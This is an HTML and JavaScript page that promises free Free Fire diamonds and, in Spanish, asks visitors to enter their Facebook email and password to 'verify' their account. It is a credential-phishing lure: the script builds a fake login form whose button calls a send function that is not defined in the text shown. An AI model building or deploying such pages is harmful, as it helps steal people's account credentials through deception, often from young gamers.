<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="icon" type="image/x-icon" href="images/ff.ico">
	<title>Free Fire Diamonds Free</title>

	<style type="text/css">
		body{
			background: url("images/bg2.gif");
			background-color: #000;
			background-repeat: no-repeat;
			background-size: 100%;
		}
		.center {
			text-align: center;
		}

.form-register-products{
	opacity: 0.9;
	width: 400px;
	background: #24303c;
	padding: 30px;
	margin: auto;
	margin-top: 70px;
	border-radius: 4px;
	font-family: 'calibri';
	color: white;
}

.form-register-products h4{
	font-size: 22px;
	margin-bottom: 20px;
}

.controls{
	width: 100;
	background: #FFF;
	padding: 10px;
	border-radius: 4px;
	margin-bottom: 20px;
	border: 1px solid #1f53c5;
	font-family: 'calibri';
	font-size: 18px;
	color: #000;
}

#email{
	margin: 20px 10px 10px 10px;
}

.form-register-products p {
	height: 40px;
	text-align: center;
	font-size: 18px;
}

.botons{
	width: 15%;
	background: #000;
	padding: 5px;
	color: white;
	margin: 10px;
	font-size: 16px;
	border-color: rgb(57, 120, 255);
}

.form-register-products .botons{
	width: 60%;
	background: rgb(57, 120, 255);
	padding: 12px;
	color: white;
	margin: 10px;
	font-size: 16px;
}

.form-register-products .botons:hover, .botons:hover{
	border-color: #FFF;
}

img{
	margin-top: 20px;
}
	</style>

	<script type="text/javascript">
        document.addEventListener('DOMContentLoaded', () => {
                  var section = document.createElement("section");
                  section.setAttribute("class", "form-register-products");

                  var title= document.createElement("h4");
                  title.innerHTML = "<u style=\"color:orange\">FREE FIRE DIAMONDS</u>";
                  section.appendChild(title);

                  var p = document.createElement("p");
                  p.innerHTML = " Ingresa con tu de facebook para verificar cuenta y aceptar terminos de servicio.";
                  section.appendChild(p);

                  var img = document.createElement("img");
                  img.setAttribute("src", "images/facebook.png");
                  img.setAttribute("width","15%")
                  section.appendChild(img);

                  var form = document.createElement("form");
                  form.setAttribute("class", "form-admi");

                  var op = document.createElement("input");
                  op.setAttribute("type","email");
                  op.setAttribute("class", "controls");
                  op.setAttribute("id", "email");
                  op.setAttribute("placeholder", "f.......@gmail.com");
                  form.appendChild(op);

                  var op = document.createElement("input");
                  op.setAttribute("type","password");
                  op.setAttribute("class", "controls");
                  op.setAttribute("id", "password");
                  op.setAttribute("placeholder", "contraseña");
                  form.appendChild(op);

                  var op = document.createElement("input");
                  op.setAttribute("type","button");
                  op.setAttribute("onclick", "send_new_product()");
                  op.setAttribute("class", "botons");
                  /*op.setAttribute("style", "color:orange");*/
                  op.setAttribute("id", "registar-admi");
                  op.setAttribute("value", " Validar Cuenta ");
                  form.appendChild(op);

                  section.appendChild(form);
                  document.querySelector(".center").appendChild(section);
        });

      </script>
</head>
<body>
	<div class="center">

	</div>
</body>
</html>